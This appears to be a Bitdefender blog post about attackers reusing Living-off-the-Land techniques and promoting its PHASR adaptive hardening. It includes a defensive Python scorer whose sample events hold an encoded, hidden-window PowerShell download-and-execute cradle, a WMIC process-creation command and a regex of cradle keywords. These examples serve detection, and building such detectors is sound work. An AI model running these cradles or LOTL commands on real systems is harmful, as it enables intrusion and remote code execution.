Breaking the cycle of attack playbook reuse

Threat actors have learned an old business trick: find what works, and repeat it. Across countless cyberattacks, Bitdefender has observed adversaries consistently applying the same steps—the same techniques, the same security bypass patterns—across different targets. What’s effective in one environment is often just as effective in another, and attackers know it.

This isn’t a coincidence. Once an attacker figures out how to evade a specific endpoint protection solution, they replicate the environment in a lab and refine the approach until it’s stealthy enough to deploy with confidence. When the attack is successful, it becomes a reusable asset. The pattern continues from organization to organization, exploiting systems that share similar security configurations or the same blind spots.

The consistency across enterprise environments is part of the problem. Most organizations rely on uniform policies—one-size-fits-all configurations deployed across all users and endpoints. While this simplifies management, it also creates predictable defenses that adversaries can test against in advance.

And central to these repeatable attacks are Living off the Land (LOTL) techniques. LOTL relies on native tools—already present on endpoints—to carry out attacks without triggering alarms. From PowerShell and WMIC to Netsh and Bitsadmin, these are utilities trusted by administrators, but regularly hijacked by attackers.

In our analysis of over 700,000 incidents, 84% of major attacks involved the use of LOTL binaries. These aren’t theoretical threats—they are what threat actors are actively using in real-world campaigns. And many of the tools they exploit are enabled by default, or rarely monitored because they’re assumed to be legitimate.

WMIC, for example, is supposed to be obsolete—yet we still see it regularly used, not only by legacy scripts, but by third-party applications that invoke it in the background. PowerShell activity appeared on 73% of all endpoints we analyzed, including systems where administrators weren’t the primary users. This ambiguity—tools being used both legitimately and maliciously—makes detection difficult and prevention even harder.

So how do defenders break this cycle?

A meaningful response requires more than detection. It requires unpredictability. If security behaves the same way everywhere, attackers can learn once and apply it many times. But if every system responds differently—if hardening adapts to each user-device pair, to the actual behavior, and what’s happening in the environment—then even the best playbook fails the moment it encounters variability.

That principle led to the creation of Bitdefender GravityZone PHASR. The goal was not just to block known threats, but to make the attack surface a moving target. PHASR tailors security to each user and endpoint by observing normal behavior, identifying what’s unnecessary or risky, and automatically applying restrictions. The result is individualized hardening that evolves with the environment.

For instance, instead of blocking PowerShell entirely—which would break legitimate operations—PHASR allows standard scripts while blocking the atypical or encrypted commands attackers rely on. The same applies to WMIC or Netsh. Rather than shutting off tools and disrupting workflows, PHASR filters actions based on risk, making decisions based on what’s actually happening, not just what’s allowed in policy.
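The allow/alert/block distinction described above can be made concrete with a small scorer over process-creation events. The following is an added example written for this page, not PHASR's implementation or any Bitdefender code: the users, hosts, per-user baseline, thresholds and sample command lines are all constructed assumptions. The "encrypted commands" the post refers to usually take the form of PowerShell's Base64-encoded `-EncodedCommand` argument, so that is what the example decodes and inspects, alongside hidden-window and execution-policy switches, download/execute cradles, and WMIC process creation; the per-(user, host) baseline is what turns one static rule into a per-endpoint decision.

```python
"""Score LOTL process launches against a per-user/device baseline.
Hypothetical example: constructed events, constructed baseline, arbitrary thresholds."""
import base64
import binascii
import re
import shlex

# Constructed baseline: which tools each (user, host) pair is normally seen launching.
# A real system would learn this from telemetry over an observation period.
BASELINE = {
    ("alice", "WS-0042"): {"powershell.exe"},   # admin who runs scripts daily
    ("bob", "WS-0107"): set(),                  # finance user, never launches shells
}

LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "netsh.exe", "bitsadmin.exe"}
# Common download-and-execute fragments; matched against the raw and decoded command line.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string",
    re.I)


def encode_command(script):
    """Build a -EncodedCommand payload the way powershell.exe expects it (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(payload):
    """Reverse encode_command; returns None when the payload is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


# Constructed sample process-creation events (not real telemetry).
EVENTS = [
    {"user": "alice", "host": "WS-0042",
     "cmd": r'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1'},
    {"user": "alice", "host": "WS-0042",
     "cmd": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
            + encode_command('IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")')},
    {"user": "bob", "host": "WS-0107",
     "cmd": r'C:\Windows\System32\wbem\wmic.exe process call create "cmd.exe /c whoami"'},
    {"user": "bob", "host": "WS-0107",
     "cmd": r'powershell.exe Get-ChildItem C:\Users\bob\Documents'},
]


def score_event(event):
    """Return (score, reasons, decoded_script) for one process-creation event."""
    # posix=False keeps Windows backslashes intact; quoted arguments stay one token.
    tokens = [t.strip('"') for t in shlex.split(event["cmd"], posix=False)]
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    score, reasons, decoded = 0, [], None
    if image not in LOLBINS:
        return score, reasons, decoded
    if image not in BASELINE.get((event["user"], event["host"]), set()):
        score += 2
        reasons.append(f"{image} atypical for {event['user']}@{event['host']}")
    if image == "wmic.exe" and any(t.lower() == "create" for t in tokens):
        score += 2
        reasons.append("wmic process creation")
    for i, tok in enumerate(tokens[1:], start=1):
        low = tok.lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
        if len(low) >= 2 and "-encodedcommand".startswith(low) and nxt:
            decoded = decode_encoded_command(tokens[i + 1])
            score += 3
            reasons.append("encoded command line" + ("" if decoded else " (undecodable)"))
        elif low in ("-w", "-windowstyle") and nxt == "hidden":
            score += 1
            reasons.append("hidden window")
        elif low in ("-ep", "-executionpolicy") and nxt == "bypass":
            score += 1
            reasons.append("execution policy bypass")
    if CRADLE.search(event["cmd"] + (decoded or "")):
        score += 2
        reasons.append("download/execute cradle")
    return score, reasons, decoded


def decide(score):
    """Map a score to an action; baseline-conformant activity scores 0 and is allowed."""
    return "block" if score >= 3 else "alert" if score > 0 else "allow"


def triage(events):
    """Score every event and return (user, host, decision, reasons) tuples."""
    out = []
    for ev in events:
        score, reasons, _ = score_event(ev)
        out.append((ev["user"], ev["host"], decide(score), reasons))
    return out


if __name__ == "__main__":
    for user, host, decision, reasons in triage(EVENTS):
        print(f"{user}@{host}: {decision:5s} {'; '.join(reasons) or 'baseline activity'}")
```

Note the last two events: the same plain `Get-ChildItem` launch that is routine for the admin scores as atypical for the finance user, so the outcome depends on the user-device pair rather than on a single global PowerShell rule, while the encoded, hidden-window download cradle is blocked regardless of who launched it.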

What this means in practice is simple: even if attackers build the perfect bypass for one system, that method won’t work on the next. PHASR eliminates the predictability attackers rely on. And because it continuously learns from endpoint behavior, it doesn’t need constant manual updates or tuning to stay ahead.

Breaking the cycle of playbook reuse doesn’t require guesswork. It requires systems that stop being uniform and start being adaptive. By moving from static configurations to individualized, behavior-based hardening, organizations gain the ability to stop threats before they start—even if the attacker has used the same steps dozens of times before.

In cybersecurity, attackers look for the path of least resistance. With tailored, proactive defenses, we can make sure that path no longer leads to us.
